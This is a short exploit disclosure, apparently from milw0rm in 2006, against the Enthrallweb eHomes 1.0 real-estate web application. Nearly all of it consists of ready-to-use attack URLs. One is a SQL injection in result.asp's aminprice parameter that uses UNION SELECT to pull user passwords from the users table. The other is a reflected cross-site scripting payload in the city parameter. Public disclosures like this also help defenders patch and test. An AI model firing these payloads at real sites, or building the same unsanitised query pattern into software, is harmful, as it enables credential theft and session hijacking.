Enthrallweb eHomes 1.0 Multiple SQLXSS Vulnerabilities.pdf

1 ******************************************************************************* 2 # Title : Enthrallweb eHomes 1.0 Multiple (SQL/XSS) Vulnerabilities 3 # Author : ajann 4 # Contact : :( 5 # S.Page : http://www.enthrallweb.us 6 # $ : 179.40 USD 7 8 ******************************************************************************* 9 10 [[SQL]]]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 11 12 http://[target]/[path]//result.asp?city=&State=&amaxprice=10000000&abedrooms=&cat=&aminprice=[SQL] 13 14 Example: 15 16 //result.asp?city=&State=&amaxprice=10000000&abedrooms=&cat=&aminprice=0%20union%20select%20U_Password,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users 17 18 [[/SQL]] 19 20 [[XSS]]]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 21 22 http://[target]/[path]//result.asp?city=[XSS] 23 24 Example: 25 26 //result.asp?city=%22%3E%3Cscript%3Ealert%28%27x%27%29%3B%3C%2Fscript%3E+ 27 28 [[/XSS]] 29 30 31 """"""""""""""""""""" 32 # ajann,Turkey 33 # ... 34 35 # Im not Hacker! 36 37 # milw0rm.com [2006−12−23] Page 1/1 Enthrallweb eHomes 1.0 Multiple SQLXSS Vulnerabilities ajann 12/23/2006